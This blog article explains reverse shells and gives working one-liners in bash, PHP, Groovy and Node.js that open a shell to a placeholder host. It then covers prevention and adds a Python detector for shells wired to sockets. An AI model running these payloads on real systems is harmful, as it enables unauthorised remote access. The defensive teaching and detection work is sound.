Reverse Shell Access and how to prevent it

Aung Kyaw Nyunt
A reverse shell is a shell session established over a network connection that the remote host opens back to a listener under our control.
A reverse shell connection is similar to an SSH connection: once the SSH connection is established, we can execute commands, and a reverse shell lets us execute commands in the same way.
The difference is that SSH needs credentials, while a reverse shell does not.
Reverse shells can also work across a NAT or firewall, because the connection is initiated outbound from the remote host rather than inbound to it.
Please check the following commands for creating a reverse shell in different environments.
In this article, our public server's IP address is xxx.xxx.xxx.xxx and we will listen on port 80.
On the public server side, listen for the incoming connection:

    nc -lvp 80

While we are listening for the connection on our public server's port 80,
we have to create the reverse shell from the remote server.
The following commands are run on the remote server.
Bash Reverse Shell

    /bin/bash -i >& /dev/tcp/xxx.xxx.xxx.xxx/80 0>&1

PHP Reverse Shell

    php -r '$sock=fsockopen("xxx.xxx.xxx.xxx",80);exec("/bin/sh -i <&3 >&3 2>&3");'

Java Reverse Shell

    // Groovy syntax (list literal and "as String[]"), not plain Java;
    // listener address and port follow the article's xxx.xxx.xxx.xxx:80 convention
    r = Runtime.getRuntime()
    p = r.exec(["/bin/bash", "-c", "exec 5<>/dev/tcp/xxx.xxx.xxx.xxx/80;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
    p.waitFor()

NodeJS Reverse Shell

    (function(){
        const net = require("net"), cp = require("child_process"), sh = cp.spawn("/bin/sh", []);
        const client = new net.Socket();
        client.connect(80, "xxx.xxx.xxx.xxx", function(){
            client.pipe(sh.stdin); sh.stdout.pipe(client); sh.stderr.pipe(client);
        });
        return /a/; // Prevents the Node.js application from crashing
    })();

or

    require('child_process').exec('nc -e /bin/sh xxx.xxx.xxx.xxx 80')

or

    var x = global.process.mainModule.require
    x('child_process').exec('nc xxx.xxx.xxx.xxx 80 -e /bin/bash')
How to prevent it?
In general, a reverse shell on its own is not malicious and can also be used for legitimate purposes, for example for remote server administration.
If you don't need to use reverse shells, you can try to limit the possibility of creating them, but it is very difficult:
  • You can impose strict control of outgoing connections.
    However, this is only possible for very specialized servers.
    And there is nothing to stop the attacker from opening a listener on a common port such as 80 (as in the commands above). In such a case, all connections would have to be monitored for content as well.
  • You can disable most tools that make it possible to create a reverse shell, but again this is only possible for very specialized servers. As you can see above, reverse shells can be created using many different tools and languages. Therefore, you may make it more difficult for the attacker, but not impossible.
  • Set up your web server in a private subnet, so that it has no direct route to a listener on the Internet.
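As an added example (not code from the original article), here is a host-side check that complements the egress controls above: every reverse shell variant listed earlier, whatever language launches it, ends up as a shell process whose standard streams point at a socket, and that is visible in /proc. It assumes a Linux host and that the names in SHELL_NAMES cover the shells and interpreters installed there; the sample process table is constructed, not captured.

```python
import os
import re
from typing import Dict, List, Tuple

# Shells and interpreters that the one-liners above end up handing a socket to (assumed list).
SHELL_NAMES = {"sh", "bash", "dash", "zsh", "php", "node", "java", "perl", "python", "python3"}
SOCKET_RE = re.compile(r"^socket:\[\d+\]$")

def is_shell_on_socket(comm: str, fd_targets: Dict[int, str]) -> bool:
    """True when a shell/interpreter has stdin, stdout or stderr wired straight to a socket.
    comm is /proc/<pid>/comm; fd_targets maps fd number -> readlink('/proc/<pid>/fd/<n>').
    Every variant above (bash /dev/tcp, php exec, nc -e, node pipe) ends up in this shape."""
    if comm not in SHELL_NAMES:
        return False  # inetd-style daemons legitimately start with a socket on their stdio
    return any(SOCKET_RE.match(fd_targets.get(fd, "")) for fd in (0, 1, 2))

def scan_proc(proc_root: str = "/proc") -> List[Tuple[int, str]]:
    """Walk a Linux /proc tree and return (pid, comm) for every process that matches."""
    hits: List[Tuple[int, str]] = []
    if not os.path.isdir(proc_root):
        return hits
    for entry in os.listdir(proc_root):
        if not entry.isdigit():
            continue
        pid, targets = int(entry), {}
        try:
            with open(f"{proc_root}/{pid}/comm") as f:
                comm = f.read().strip()
            for fd in (0, 1, 2):
                try:
                    targets[fd] = os.readlink(f"{proc_root}/{pid}/fd/{fd}")
                except OSError:
                    pass  # that fd is closed
        except OSError:
            continue  # process exited, or reading another user's fd table needs root
        if is_shell_on_socket(comm, targets):
            hits.append((pid, comm))
    return hits

# Constructed sample modelled on real readlink() results (not captured from a live host).
SAMPLE_PROCESSES = {
    101: ("bash", {0: "/dev/pts/0", 1: "/dev/pts/0", 2: "/dev/pts/0"}),           # admin on a terminal
    202: ("sshd", {0: "socket:[44121]", 1: "socket:[44121]", 2: "/dev/null"}),     # inetd-style daemon
    303: ("sh", {0: "socket:[55871]", 1: "socket:[55871]", 2: "socket:[55871]"}),  # reverse shell shape
    404: ("bash", {0: "/dev/pts/1", 1: "pipe:[7712]", 2: "/dev/pts/1"}),           # shell in a pipeline
}

def flag_sample() -> List[int]:
    """Apply the check to the constructed sample; only pid 303 is reported."""
    return [pid for pid, (comm, fds) in SAMPLE_PROCESSES.items() if is_shell_on_socket(comm, fds)]
```

Run scan_proc() as root on the web server (for example from cron) to cover every user's processes; flag_sample() shows the decision logic on the constructed table.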
I hope this article helps with your needs.
Thank you for taking the time to read my article. I hope you find it helpful. Please feel free to reach out if you have any questions or would like to discuss further.